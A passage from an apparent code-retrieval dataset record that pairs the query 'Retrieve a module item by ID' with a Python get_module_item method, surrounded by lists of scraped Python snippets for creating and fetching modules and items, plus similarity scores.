self.moduleList.addItem(item)\n\n # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #", "def _createModuleObj(self):\n ModuleTimeWeakening.__init__(self)\n return", "def register(self, module):\n tagvalues = \"\\n\".join([\"%s: %s\" % (attr, str(getattr(module, attr))) for attr in dir(module) if attr in ['create', 'menu', 'name', 'label'] ])\n # tagvalues = \"\\n\".join([\"%s\" % (attr) for attr in dir(module) if attr not in ['urls'] ])\n logger.debug(\"module {} registered.\\ndir : {}\".format(module.label, tagvalues ))\n self._registry[module.label] = module\n self._modules[module.name] = module\n pass", "def new_module(reset_sys_argv, move_home_pypackage):\n\n TestModule.make_new()\n mod_path = TestModule.full_path()\n os.mkdir(mod_path)\n os.chdir(mod_path)\n return mod_path", "def insert_workflow_module(self, project_id, branch_id, before_module_id, command):\n with self.backend.lock:\n # Get the handle for the specified branch and the branch head\n branch = self.projects.get_branch(project_id=project_id, branch_id=branch_id)\n if branch is None:\n return None\n head = branch.get_head()\n if head is None or len(head.modules) == 0:\n return None\n\n # Get the index of the module at which the new module is inserted\n module_index = None\n modules = head.modules\n for i in range(len(modules)):\n if modules[i].identifier == before_module_id:\n module_index = i\n break\n if module_index is None:\n return None\n\n # Get handle for the inserted module\n context = compute_context(modules[0:module_index])\n # Create handle for the inserted module. The state of the module\n # depends on the state of the backend.\n if head.is_active:\n state = mstate.MODULE_PENDING\n else:\n state = self.backend.next_task_state()\n inserted_module = ModuleHandle(\n command=command,\n state=state,\n external_form=command.to_external_form(\n command=self.packages[command.package_id].get(command.command_id),\n datasets=[ context[name] for name in context if context[name].is_dataset ]\n ),\n provenance=ModuleProvenance(unexecuted=True)\n )\n # Create list of pending modules for the new workflow.\n pending_modules = [inserted_module]\n for m in modules[module_index:]:\n pending_modules.append(\n ModuleHandle(\n command=m.command,\n external_form=m.external_form,\n outputs=m.outputs,\n provenance=m.provenance\n )\n )\n workflow = branch.append_workflow(\n modules=modules[:module_index],\n action=wf.ACTION_INSERT,\n command=inserted_module.command,\n pending_modules=pending_modules\n )\n if not head.is_active:\n self.execute_module(\n project_id=project_id,\n branch_id=branch_id,\n module=workflow.modules[module_index],\n artifacts=context,\n )\n return workflow.modules[module_index:]", "def create(cls, payload: dict) -> 'Item':\n payload['slug'] = create_order_slug()\n return super().create(payload)", "def create_submodule(self, *args: Any, **kwargs: Any) -> Submodule:\n return Submodule.add(self, *args, **kwargs)", "def newItem():\n if request.method == 'POST':\n db.createItem(\n title=request.form['title'],\n description=request.form['description'],\n category_id=request.form['category'],\n user_id=login_session['user_id'])\n flash(\"New catalog item created!\", 'success')\n return redirect(url_for('showCatalog'))\n return render_template('new_item.html', categories=db.getAllCategories())", "def _createModuleObj(self):\n ModuleTimeHistory.__init__(self)", "def create():\n pass", "def create_item(_id, item_name, description):\n data_ = Data.get_the_data(_id, Data.bucketlists)\n for data in data_:\n bucketlist = Bucketlist(data['title'],\n data['owner'],\n data['intro'],\n data['owner_id'],\n data['_id'])\n bucketlist.new_item(item_name=item_name,\n description=description)", "def make_module(module_name, module_type, parameters):\n\n module = {module_name: {}}\n \n for parameter in parameters:\n required = input(\"Is \" + parameter + \" required (y/n)?\")\n \n if required == 'n':\n module[module_name][parameter] = None \n\n elif required == 'y':\n module[module_name][parameter] = 'r'\n \n with open('all_modules.yml', 'a') as file_object:\n yaml.dump(module, file_object, default_flow_style=False, sort_keys=False)", "def new(self, *args, **kw):\n id_tipo_item = UrlParser.parse_id(request.url, \"tipositems\")\n url_action = \"./\"\n\n pp = PoseePermiso('redefinir tipo item', id_tipo_item=id_tipo_item)\n if not pp.is_met(request.environ):\n flash(pp.message % pp.nombre_permiso, 'warning')\n redirect(atras)\n tmpl_context.widget = self.new_form\n return dict(value=kw, \n page=u\"Nuevo Atributo\", \n action=url_action, \n atras=url_action)", "def create_add_new_item(self, name, count=1):\r\n item = Item.create_by_name(name)\r\n stackable = item.get_stackable()\r\n if stackable:\r\n stackable.set_count(count)\r\n else:\r\n assert count == 1, 'cannot set count attributes on non-stackable item %s' % name\r\n return self.add_item(item)", "def create(self, mapItem: MapItem) -> int:\n pass", "def create_test_inventory(**kw):\n inventory = get_test_inventory(**kw)\n # Let DB generate ID if it isn't specified explicitly\n if 'id' not in kw:\n del inventory['id']\n dbapi = db_api.get_instance()\n return dbapi.create_node_inventory(inventory)", "def create(index):\n # Get the project root\n project_root = get_project_root()\n package_name = os.path.basename(project_root)\n logging.info(\"Creating package for current project: \" + package_name)\n Packager(package_name, project_root).create(index)", "def __init_module(self, module_type: str) -> Module:\n\n module = {\n \"button\": Button,\n \"dial\": Dial,\n \"display\": Display,\n \"env\": Env,\n \"gyro\": Gyro,\n \"ir\": Ir,\n \"led\": Led,\n \"mic\": Mic,\n \"motor\": Motor,\n \"speaker\": Speaker,\n \"ultrasonic\": Ultrasonic,\n }.get(module_type)\n return module", "def make_module_instance(self, *args, **kwargs):\r\n\r\n # Function to go through member lists and dictionaries recursively,\r\n # to look for submodules on which make_module_instance needs to be called\r\n def recurse(v):\r\n if isinstance(v,list):\r\n iterv = enumerate(v)\r\n else:\r\n iterv = v.iteritems()\r\n #backport\r\n #iter = enumerate(v) if isinstance(v,list) else v.iteritems()\r\n for sk,sv in iterv:\r\n if isinstance(sv,(list,dict)):\r\n sv = recurse(sv)\r\n elif isinstance(sv,Module):\r\n sv = sv.make_module_instance(args,kwargs)\r\n v[sk] = sv\r\n return v\r\n\r\n for k,v in self.local_attr.iteritems():\r\n if isinstance(v,Module):\r\n v = v.make_module_instance(args,kwargs)\r\n self[k] = self.__wrapper__(v)\r\n elif isinstance(v,Method):\r\n self.__setitem__(k,v)\r\n else:\r\n # iterate through lists and dictionaries to wrap submodules\r\n if isinstance(v,(list,dict)):\r\n self[k] = self.__wrapper__(recurse(v))\r\n try:\r\n self[k] = self.__wrapper__(v)\r\n except Exception:\r\n if isinstance(v, Component):\r\n raise\r\n else:\r\n self.__dict__[k] = v\r\n return self", "def Create(self, finder):\n today = datetime.datetime.today()\n sourceTimestamp = 0\n for module in finder.modules:\n if module.file is None:\n continue\n if module.inZipFile:\n continue\n if not os.path.exists(module.file):\n raise ConfigError(\"no file named %s (for module %s)\",\n module.file, module.name)\n timestamp = os.stat(module.file).st_mtime\n sourceTimestamp = max(sourceTimestamp, timestamp)\n sourceTimestamp = datetime.datetime.fromtimestamp(sourceTimestamp)\n self.values[\"BUILD_TIMESTAMP\"] = today.strftime(self.timeFormat)\n self.values[\"BUILD_HOST\"] = socket.gethostname().split(\".\")[0]\n self.values[\"SOURCE_TIMESTAMP\"] = \\\n sourceTimestamp.strftime(self.timeFormat)\n module = finder._AddModule(self.moduleName)\n sourceParts = []\n names = list(self.values.keys())\n names.sort()\n for name in names:\n value = self.values[name]\n sourceParts.append(\"%s = %r\" % (name, value))\n source = \"\\n\".join(sourceParts)\n module.code = compile(source, \"%s.py\" % self.moduleName, \"exec\")\n return module", "def createItem(category_id):\r\n if 'username' not in login_session:\r\n return redirect(url_for('showLogin'))\r\n if request.method == 'POST':\r\n session = DBSession()\r\n item = Item(name=request.form['name'],\r\n description=request.form['description'],\r\n category_id=category_id,\r\n user_id=login_session['user_id'])\r\n session.add(item)\r\n session.commit()\r\n return redirect(url_for('showCategoryItems', category_id=category_id))\r\n else:\r\n return render_template('newitem.html', category_id=category_id)", "def create_modules(self):\n self.bitcell = self.replica_bitcell = self.mod_replica_bitcell()\n self.add_mod(self.bitcell)\n\n # This is the replica bitline load column that is the height of our array\n self.rbl = bitcell_array(name=\"bitline_load\", cols=1, rows=self.bitcell_loads)\n self.add_mod(self.rbl)\n\n # FIXME: The FO and depth of this should be tuned\n self.delay_chain = self.mod_delay_chain([self.delay_fanout]*self.delay_stages)\n self.add_mod(self.delay_chain)\n\n self.inv = pinv()\n self.add_mod(self.inv)\n\n self.access_tx = ptx(tx_type=\"pmos\")\n self.add_mod(self.access_tx)", "def item_create(\n item, item_id, item_type, create=\"create\", extra_args=None, cibfile=None\n):\n cmd = [\"pcs\"]\n if isinstance(cibfile, str):\n cmd += [\"-f\", cibfile]\n\n if isinstance(item, str):\n cmd += [item]\n elif isinstance(item, (list, tuple)):\n cmd += item\n\n # constraint command follows a different order\n if item in [\"constraint\"]:\n if isinstance(item_type, str):\n cmd += [item_type]\n\n if isinstance(create, str):\n cmd += [create]\n elif isinstance(create, (list, tuple)):\n cmd += create\n\n # constraint command needs item_id in format 'id=<id' after all params\n # constraint command follows a different order\n if item not in [\"constraint\"]:\n cmd += [item_id]\n if isinstance(item_type, str):\n cmd += [item_type]\n\n if isinstance(extra_args, (list, tuple)):\n # constraint command needs item_id in format 'id=<id' after all params\n if item in [\"constraint\"]:\n extra_args = extra_args + [\"id={}\".format(item_id)]\n cmd += extra_args\n\n return __salt__[\"cmd.run_all\"](cmd, output_loglevel=\"trace\", python_shell=False)", "def create_or_modify_module_db(request, module_db_id=None):\n success = False\n data_obj = {}\n errors = []\n try:\n if request.method == 'POST':\n json_obj = json.loads(request.body)\n list_name = json_obj.get('list_name', None)\n status = json_obj.get('status', None)\n origin = json_obj.get('origin', None)\n destination = json_obj.get('destination', None)\n if list_name:\n if module_db_id:\n list_db = ModuleContactListDB.objects.get(id=module_db_id)\n list_db.list_name = list_name\n list_db.status = status\n list_db.origin = origin\n list_db.destination = destination\n list_db.save()\n data_obj = list_db.as_dict\n else:\n current_user = Client.objects.get(user=request.user)\n list_db = ModuleContactListDB.objects.create(\n list_name=list_name,\n owner=current_user,\n origin=origin,\n destination=destination,\n status=status\n )\n data_obj = list_db.as_dict\n success = True\n except Exception as e:\n errors = e.args\n\n data = {'success': success, 'errors': errors, 'data': data_obj}\n return json_response(data)", "def create_sample_order_item(item, quantity, data_only):\n order_item_info = {\n 'item': item.pk,\n 'quantity': quantity\n }\n if data_only:\n return order_item_info\n\n else:\n order_item_obj = OrderItem.objects.create(\n item=item,\n quantity=quantity\n )\n order_item_info[\"id\"] = order_item_obj.id\n return order_item_obj, order_item_info", "def __update_module(item):\n\n conn = sqlite3.connect(DTF_DB)\n cur = conn.cursor()\n\n # Remove the line first.\n sql = ('DELETE FROM modules '\n \"WHERE name='%s'\" % item.name)\n\n cur.execute(sql)\n\n entry = [(item.name, item.about, item.version,\n item.author, item.install_name)]\n\n # Update a Module Entry\n sql = ('INSERT INTO modules (name, about, version, '\n 'author, install_name)'\n 'VALUES (?, ?, ?, ?, ?)')\n\n cur.executemany(sql, entry)\n conn.commit()\n\n return cur.rowcount", "def get_module_item(self, module_item, **kwargs):\n module_item_id = obj_or_id(module_item, \"module_item\", (ModuleItem,))\n\n response = self._requester.request(\n \"GET\",\n \"courses/{}/modules/{}/items/{}\".format(\n self.course_id, self.id, module_item_id\n ),\n _kwargs=combine_kwargs(**kwargs),\n )\n module_item_json = response.json()\n module_item_json.update({\"course_id\": self.course_id})\n\n return ModuleItem(self._requester, module_item_json)", "def create_module_file(package, module, opts):\n text = format_heading(1, '%s Module' % module)\n #text += format_heading(2, ':mod:`%s` Module' % module)\n text += format_directive(module, package)\n write_file(makename(package, module), text, opts)", "def add_item(self, obj): # deprecated\n logger.info('ItemProduct adding item initiated')\n try:\n if not obj['edit']:\n unit, = self.ProductUom.find([('name', '=', obj['units'])])\n template = self.ProductTemplate()\n try:\n if self.Product.find([('code', '=', obj['id']), ('description', '=', 'Stock'),\n ('type', '=', 'goods')])[-1]:\n return False\n if self.Product.find([('name', '=', obj['name']), ('description', '=', 'Stock'),\n ('type', '=', 'goods')])[-1]:\n return False\n except Exception:\n pass\n template.category = self.ProductCategory.find([('name', '=', obj['category'])])[-1]\n template.default_uom = unit\n template.purchase_uom = unit\n template.type = 'goods'\n else:\n product = self.Product.find([('code', '=', obj['id']), ('description', '=', 'Stock'),\n ('type', '=', 'goods')])[-1]\n template = product.template\n unit, = self.ProductUom.find([('name', '=', obj['units'])])\n template.default_uom = unit\n template.purchase_uom = unit\n template.category = self.ProductCategory.find([('name', '=', obj['category'])])[-1]\n\n rate = Decimal(obj['rate'])\n cost = rate / 2\n template.name = obj['name']\n template.list_price = Decimal(rate)\n template.cost_price = Decimal(cost)\n template.purchasable = True\n template.account_expense = self.accounts['expense']\n template.account_receivable = self.accounts['receivable']\n product = self.Product.find([('name', '=', template.name),\n ('description', '=', 'Stock'), ('type', '=', 'goods')])\n if product:\n product = product[-1]\n else:\n product = self.Product.find([('name', '=', template.name), ('type', '=', 'goods')])\n ids = []\n for i in product:\n ids.append(i.id)\n ids.sort()\n print \"ids\", ids\n product = self.Product(id=ids[-1])\n product.code = obj['id']\n product.description = 'Stock'\n product.save()\n return True\n except Exception:\n if settings.level == 10:\n logger.exception('raised exception')\n return False", "def create_menu_item(menu, label, func, id=None, help=\"\", kind=wx.ITEM_NORMAL, bind_to=None):\n if id is None:\n id = wx.ID_ANY\n item = wx.MenuItem(menu, id, label, help, kind)\n if bind_to == None: # bind to the menu by default\n menu.Bind(wx.EVT_MENU, func, id=item.GetId())\n else:\n bind_to.Bind(wx.EVT_MENU, func, id=item.GetId())\n menu.Append(item)\n return item", "def create(self, *args, **kwargs):\n pass", "def create_and_save_xmodule(self, location, definition_data=None, metadata=None, system=None,\r\n fields={}):\r\n # differs from split mongo in that I believe most of this logic should be above the persistence\r\n # layer but added it here to enable quick conversion. I'll need to reconcile these.\r\n new_object = self.create_xmodule(location, definition_data, metadata, system, fields)\r\n location = new_object.scope_ids.usage_id\r\n self.update_item(new_object, allow_not_found=True)\r\n\r\n # VS[compat] cdodge: This is a hack because static_tabs also have references from the course module, so\r\n # if we add one then we need to also add it to the policy information (i.e. metadata)\r\n # we should remove this once we can break this reference from the course to static tabs\r\n # TODO move this special casing to app tier (similar to attaching new element to parent)\r\n if location.category == 'static_tab':\r\n course = self._get_course_for_item(location)\r\n course.tabs.append(\r\n StaticTab(\r\n name=new_object.display_name,\r\n url_slug=new_object.scope_ids.usage_id.name,\r\n )\r\n )\r\n self.update_item(course)\r\n\r\n return new_object" ]
[ "0.7228198", "0.65279996", "0.63207406", "0.63207406", "0.6307136", "0.6218153", "0.6193564", "0.61688536", "0.6122195", "0.61181813", "0.60919625", "0.6052571", "0.6050587", "0.6030838", "0.6015427", "0.6014498", "0.6013799", "0.59456086", "0.5937084", "0.5928567", "0.5924971", "0.5920281", "0.5902033", "0.5873777", "0.5870397", "0.5856607", "0.58520806", "0.5821009", "0.57937807", "0.57715744", "0.57451516", "0.5713115", "0.5697279", "0.56801933", "0.56798196", "0.56586707", "0.56530035", "0.56483036", "0.5646686", "0.5640723", "0.5632459", "0.56240445", "0.5622746", "0.5619304", "0.5615338", "0.55965734", "0.55920595", "0.55842984", "0.5582712", "0.55771655", "0.5565845", "0.5564834", "0.5564834", "0.555787", "0.5556857", "0.55515146", "0.55433285", "0.552949", "0.5527896", "0.5525723", "0.5522393", "0.5504653", "0.5504236", "0.5487189", "0.54849046", "0.5484351", "0.54688466", "0.546695", "0.54636025", "0.54617894", "0.54461193", "0.5441786", "0.5439867", "0.54396576", "0.5436644", "0.5435951", "0.54341394", "0.54305696", "0.5427376", "0.54160255", "0.54118794", "0.5407032", "0.5406789", "0.5404673", "0.540423", "0.5396508", "0.5393766", "0.5390252", "0.5386987", "0.53839517", "0.5379776", "0.5375489", "0.53724873", "0.53704315", "0.5365443", "0.53622794", "0.53545976", "0.53506595", "0.53495854", "0.53484637" ]
0.7833921
0
Retrieve a module item by ID.
def get_module_item(self, module_item, **kwargs): module_item_id = obj_or_id(module_item, "module_item", (ModuleItem,)) response = self._requester.request( "GET", "courses/{}/modules/{}/items/{}".format( self.course_id, self.id, module_item_id ), _kwargs=combine_kwargs(**kwargs), ) module_item_json = response.json() module_item_json.update({"course_id": self.course_id}) return ModuleItem(self._requester, module_item_json)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getItem(self, id):\n path = 'item/' + id\n return self.sendRestRequest('GET', path)", "def getitem(itemID):\n\n return harvest(GET_ITEM_URL, itemID)", "def get_item_from_modulestore(usage_key, draft=False):\r\n store = modulestore('draft') if draft else modulestore('direct')\r\n return store.get_item(usage_key)", "def get_item_by_id(self, item_id):\n\n return self.api.items.get(item_id)['item']", "def get_item(item_id):\n return Item.query.filter_by(id=item_id).first()", "def read_item(id: str, request: Request):\n obj = db.get(id, kind=endpoint_model)\n return obj", "def get_item(self, item_id): # pragma: no cover\n raise NotImplementedError", "def get_item(self, item_id):\n if self._database:\n try:\n return self._database.retrieve(item_id)\n except PyragargaError:\n pass\n # TODO: Retry if it times out \n details_page = self._build_tree(\n self._session.get(KG_URL + DETAILS_SCRIPT,\n params={'id': item_id, 'filelist':1}\n ).content)\n item = self._parse_details_page(details_page, item_id)\n if self._database:\n self._database.store(item)\n self.logger.info('Received details for item %d' % item.kg_id)\n return item", "def read_item(id):\n\n username = login_session.get('username', None)\n item = session.query(Item).filter_by(id=id).one()\n item_display = {'id': item.id, 'title': item.title, 'desc': item.desc}\n return render_template(\n 'read_item.html',\n item_display=item_display,\n username=username)", "def get_item_by_id(self, id):\n results = self.table_connector.query(\n KeyConditionExpression=Key(self.primary_key).eq(id)\n )\n return results[\"Items\"][0] if \"Items\" in results else []", "def fetch_module_object(itemID):\r\n try:\r\n item = GameItemLink.objects.get(gameItemLinkID=itemID)\r\n except GameItemLink.DoesNotExist:\r\n return False, None, None\r\n\r\n return True, item.module_item_content(), item", "def itemById(self, itemId):\n itemType = \"\".join([i for i in itemId if not i.isdigit()])\n if itemType not in self.__inventory__:\n return None\n for item in self.__inventory__[itemType]:\n if item.id == itemId:\n return item\n return None", "def get_item(self, item_id):\n for item in self.order_items:\n if item.get_itemId() == item_id:\n return item", "def get_item(self, usage_key, depth=0):\r\n item = self._find_one(usage_key)\r\n module = self._load_items(usage_key.course_key, [item], depth)[0]\r\n return module", "def lookup_module(id):\n return _registry[id]", "def show_item_by_id(plugin, item_id):\n import alltheitems.item_page\n return alltheitems.item_page.item_page(plugin + ':' + item_id)", "def getItem(self, itemID, no_html=False):\n data = self._client.Item.find(int(itemID))\n item = self.makeDict(data, no_html=no_html)\n return item", "def get_by_id(cls, item_id):\n return db_session.query(cls).filter(cls.id == item_id).first()", "def item_retrieve(id):\n item = getItem(id)\n if item is None:\n return jsonify({}), 204\n else:\n return jsonify(item=item.serialize)", "def item(self, item_id):\n response = self._request(V2_ENDPOINTS['ITEMS'] + item_id)\n return response", "def find_item_by_id(self, item_id: str) -> ClientWorklistItem:\n # print(f'Finding item with id {item_id}')\n self.update_worklist()\n # print(self.__items)\n for item in self.__items:\n if item.id == item_id:\n # print('Found')\n return item\n return None", "def get_item(self, usage_key, depth=0):\r\n store = self._get_modulestore_for_courseid(usage_key.course_key)\r\n return store.get_item(usage_key, depth)", "def get_by_id(self, id: int):\n\n\t\traise NotImplemented", "def _get(self, table, _id):\n data = {\"Key\": _id}\n return self._response_handler(table, \"get_item\", data)", "def read_item(\n *,\n db: Session = Depends(deps.get_db),\n id: int,\n current_user: models.User = Depends(deps.get_current_active_user),\n) -> Any:\n item = crud.item.get(db=db, id=id)\n if not item:\n raise HTTPException(status_code=404, detail='Item not found')\n if not crud.user.is_superuser(current_user) and (item.owner_id != current_user.id):\n raise HTTPException(status_code=400, detail='Not enough permissions')\n return item", "def get_item_with_id(self, uid):\n for item in self.get_items():\n if item.id == uid:\n return item\n\n return None", "def get_object(self, id_):\n return self._objects.get(id_, None)", "def get_item_by_id(request, pk):\n item = get_object_or_404(StockItem, pk=pk)\n res_dict = {\n 'id': item.id,\n 'name': item.name,\n 'count': item.count,\n 'date_added': item.date_added,\n 'exp': item.date_of_expiration,\n 'added_by': item.added_by,\n 'cat': str(item.fk_category),\n 'subcat': str(item.fk_subcategory),\n 'notes': item.notes\n }\n return JsonResponse(res_dict)", "def get_item_detail(item_id):\n pass", "def get_item(self, itemID, no_html=False, external_id=False, depth=1):\n data = self._client.Item.find(int(itemID))\n item = self.make_dict(data, no_html=no_html, external_id=external_id, depth=depth)\n return item", "def get(self, itemId):\n\n tableRow = self.__queryTableRow(itemId)\n return self.__getItemFromTableRow(tableRow)", "async def get(self):\n identifier = self.data[\"id\"]\n item = self.core.item_manager.items.get(identifier)\n if not item:\n return self.error(\n ERROR_ITEM_NOT_FOUND,\n f\"No item found with identifier {identifier}\", status_code=404)\n\n return self.json(data=list(item.actions.keys()))", "def get_item(self, usage_key, depth=0):\r\n try:\r\n return self.modules[usage_key.course_key][usage_key]\r\n except KeyError:\r\n raise ItemNotFoundError(usage_key)", "def find_by_id(object_id, items):\n for item in items:\n if object_id == item[\"id\"]:\n return item\n\n raise Exception(f\"Item with {object_id} not found\")", "def get_by_id(cls, id):\n e = api.get([key.Key(cls.__name__, id)])\n if e:\n return cls.from_entity(e[0])\n raise ObjectDoesNotExist", "def get(self, _id):", "def get_item(self, item_id):\n\n response = self._get_page_param('item', item_id).json()\n\n if not response:\n raise InvalidItemID\n\n return Item(response)", "def get_item(id):\n return jsonify(id=id, name='name', number=123)", "def get_by_id(cls, id):\n return cls.query().get(id)", "async def get_item(\n request: Request,\n response: Response,\n item_id: int,\n db: SAConnection = Depends(get_postgresql_connection)\n):\n cached_item = await request.app.extra['cache'].get_cache_item(item_id=item_id)\n if cached_item:\n return cached_item\n if db is None:\n response.status_code = 503\n return ResponseModel(result='Service unavailable')\n q = items.select().where(items.c.id == item_id)\n item = await db.fetchrow(query=q)\n if item is not None:\n item = Item(**item)\n await request.app.extra['cache'].set_cache_item(item=item)\n return item\n else:\n response.status_code = 404", "def get_item(self, id: str, user: User) -> Optional[T]:", "def get_by_id(self, id):\n return Entry.all().filter('entry_id = ', id).get()", "def get_object(id):", "def get_from_id(self,id=None):\n if id is None:\n return(self.items)\n if type(id) is int:\n for item in self.items:\n if item.id == id: return(item)\n items=[]\n if type(id) is list:\n return ([item.id for item in self.items if (item.id in id)])", "def find(cls, item_id):\n cls.logger.info(\"Processing lookup for shopcart item id %s ...\", item_id)\n return cls.query.get(item_id)", "def get(self, item_id: int):\n\n try:\n\n controller = self.controller()\n schema = self.schema()\n raw_data = controller.read(id=item_id)\n data = {'item': schema.dump(raw_data)}\n\n return ResponseHandler.render_response(data=data)\n\n except Exception as ex:\n\n return ResponseHandler.render_response(status=ERR, message=traceback.format_exc())", "def show(self, item_id):\n pass", "def __getitem__(self, id):\r\n \r\n if isinstance(id, basestring):\r\n return self._by_name[id]\r\n return self._by_number[id]", "def get(self, _id):\n if not self.root:\n raise RootNotSet\n node = self.id_map.get(_id)\n if not node:\n raise IDNotFound(_id)\n\n link = node.get('link')\n if link:\n link_node = self.id_map.get(_id)\n if not link_node:\n logger.error('link node not found!')\n raise IDNotFound(link_node)\n data = self.get(node['link'])\n data['link'] = data['id']\n data['id'] = link_node['id']\n return data\n\n if node.get('type') == 'group' or node.get('type') == None:\n return self._adapter._get_group(_id)\n elif node.get('type') == 'data':\n return self._adapter._load_data(_id)\n elif node.get('type') == 'json':\n return self._adapter._load_data(_id)\n elif node.get('type') == 'config':\n data = self._adapter._load_data(_id)\n data.pop('name', None)\n return data\n else:\n raise UnsupportedType", "def get(self, identifier, **kwargs):\n\n all_data = self._load()\n # if matches\n for feature in all_data['features']:\n if str(feature.get('id')) == identifier:\n return feature\n # default, no match\n err = f'item {identifier} not found'\n LOGGER.error(err)\n raise ProviderItemNotFoundError(err)", "def read_by_id(self, id, fields=None):\n assert id is not None, \"id can not be None\"\n return self.read_many_by_id([id], fields)[0]", "def get(self, id):\n return {'id': id}", "def item_record_by_id(session, record_id):\n d = session.get(api_url_base + '/items/{}'.format((record_id)),\n params=item_record_fields)\n r = ItemRecord(api_data=json.loads(d.text))\n return r", "def get(self, cls, id):\n pass", "def find_by_id(self, id_):\n return self.by_id.get(id_)", "def find_by_id(self, _id: int) -> tuple:\n item = self.model.find_by_id(_id)\n if item:\n return {'item': check_json(item)}, 200\n else:\n return {'error': {'message': 'Item not found'}}, 400", "def get_product_by_id(productId): # noqa: E501\n return 'do some magic!'", "async def read_maintenance_record_by_id(id: int, conn: Database = Depends(get_db)):\n\n item = await get(conn=conn, id=id)\n if not item:\n raise HTTPException(status_code=400, detail=\"Item not found\")\n return item", "def get_volume_from_id(item_id):\n return volumes[\"data\"][str(item_id)]", "def find_by_id(cls, iid: int):\n return cls.query.filter_by(id=iid).first()", "def get(cls, id):\n\n return cls.query.get(id)", "def get(cls, id):\n\n return cls.query.get(id)", "def read(self, id, attributes=None):\n return self._call('%s' % self._shopware_model + '/' + str(id),\n {'attributes' : attributes})", "def get(self, id):\n return self.__model__.query.get(id)", "def get_proof_item(self, id):\n return self.prf.find_item(id)", "def get_item(self, itemid: str, itemtypeid: str)->dict:\n self.__validate(itemid=itemid, itemtype=itemtypeid)\n url = build_uri_template('get_item').expand(type=itemtypeid, no=itemid)\n logger.info(\"Getting Item from: {}\".format(url))\n\n data = self._get_data(url)\n return data", "def get_object(self, id, **args):\n return self.request(\"{0}/{1}\".format(self.version, id), args)", "def test_find_stock_item_by_id(self):\n pass", "def find(self, id):\n response = self._connection.session.get(self.url + \"/%s\" % id)\n return self._raise_or_return_json(response)", "def get(self, item_name, item_id):\n item = {}\n try:\n item = self.glpi.get(item_name, item_id)\n except Exception as e:\n item = \"{ \\\"error_message\\\": \\\"%s\\\" }\" % e\n\n return item", "def get(self, id):\n pkg_key, component_key = id\n if pkg_key not in self.packages:\n raise Exception(\"Package not found while looking for id: %s \" % repr(id))\n p = self.packages[pkg_key]\n if component_key not in p.components:\n raise Exception(\"Component %s not found in package %s.\" % (component_key, pkg_key))\n return p.components[component_key]", "def jump_to_id(request, course_id, module_id):\r\n course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)\r\n items = modulestore().get_items(course_key, name=module_id)\r\n\r\n if len(items) == 0:\r\n raise Http404(\r\n u\"Could not find id: {0} in course_id: {1}. Referer: {2}\".format(\r\n module_id, course_id, request.META.get(\"HTTP_REFERER\", \"\")\r\n ))\r\n if len(items) > 1:\r\n log.warning(\r\n u\"Multiple items found with id: {0} in course_id: {1}. Referer: {2}. Using first: {3}\".format(\r\n module_id, course_id, request.META.get(\"HTTP_REFERER\", \"\"), items[0].location.to_deprecated_string()\r\n ))\r\n\r\n return jump_to(request, course_id, items[0].location.to_deprecated_string())", "def get_item_id(self, item_id):\n return self.driver.find_element_by_id(item_id)", "def get_module(self, name: str) -> ModuleInstance:\n return self.modules[name]", "def get(self, product_id):\n product = ProductModel.query.filter_by(id=product_id).first()\n if not product:\n product_api.abort(404, \"Product {} not found\".format(product_id))\n else:\n return product", "def get(self,id):\r\n person = get_one(id=id)\r\n if not person:\r\n api.abort(404)\r\n else:\r\n return person", "def get_by_id(c_id):\n return cr.get_by_id(c_id)", "def get_item(self, id):\n cmd = \"lpass show %s --json\" % id\n\n result = self.lpass(cmd)\n\n if result.return_code != 0:\n return self.handle_errors(result.output)\n\n data = json.loads(result.output)\n site = data[0]\n\n is_note = False\n\n if site[\"note\"] and not site[\"password\"]:\n is_note = True\n\n return {\n \"id\": site[\"id\"],\n \"name\": site[\"name\"] or \"\",\n \"url\": site[\"url\"] or \"\",\n \"username\": site[\"username\"] or \"\",\n \"password\": site[\"password\"] or \"\",\n \"note\": site[\"note\"],\n \"is_note\": is_note\n }", "def get(self, product_id):\n\n return product.get_single_product(product_id)", "def __get_uuid_by_id(self, id_: int) -> int:\n for module in self._modules:\n if module.id == id_:\n return module.uuid\n return None", "def get(self, product_id):\n return Products().get_one_product(product_id)", "def retrieve(self, kg_id):\n cursor = self.conn.cursor()\n cursor.execute(\"\"\"select * from items where kg_id = ?;\"\"\", (kg_id,))\n result = cursor.fetchone()\n if not result:\n raise PyragargaError(\"No item found.\")\n item = KGItem(*result)\n cursor.execute(\"\"\"select * from files where item_id = ?;\"\"\", (kg_id,))\n item.files = [unicode(x[1]) for x in cursor.fetchall()]\n # TODO: There must be a nicer way to do this\n item.genres = item.genres[2:-2].split(\"', '\")\n self.logger.info(\"Succesfully retrieved item %d\" % item.kg_id)\n return item", "def GetItem(self):\r\n \r\n return self._item", "def by_id(cls, id):\n\t\treturn DBSession.query(Power).filter(Power.power_id == id).first()", "def get_item_detail(self, identifier):\n\n try:\n return self.get_billing_item(identifier)\n except SoftLayerAPIError as exception:\n if exception.faultCode == 404:\n return self.get_billing_item_from_invoice(identifier)\n raise", "def get_item_by_index(self, index_name, id):\n results = self.table_connector.query(\n IndexName=index_name,\n KeyConditionExpression=Key(index_name).eq(id),\n )\n return results[\"Items\"] if \"Items\" in results else []", "def getByID(self, pid):\r\n i = self.pids.index(pid)\r\n return self.getByInd(i)", "def get_by_id(cls, id):\n return db.session.query(cls).get(id)", "def getItem(self, varID):\n for i in range(self.varList.count()):\n listItem = self.varList.item(i)\n if varID == listItem.getVariable().id:\n return listItem\n return None", "def get_item(\n self, id_: Union[UUID, str], full_dataset: bool = True\n ) -> Optional[DatasetItem]:\n items = list(\n self.search_items(\n dataset_ids=[id_], full_dataset=full_dataset, order=ItemSort.UNSORTED\n )\n )\n if not items:\n return None\n if len(items) > 1:\n raise RuntimeError(\n \"Something is wrong: Multiple dataset results for a single UUID\"\n )\n\n [item] = items\n return item", "def get(self, id):\n return self.__get_object(super(PullRequests, self).get(id))", "def findItem(self, id):\n itemFound = None\n for 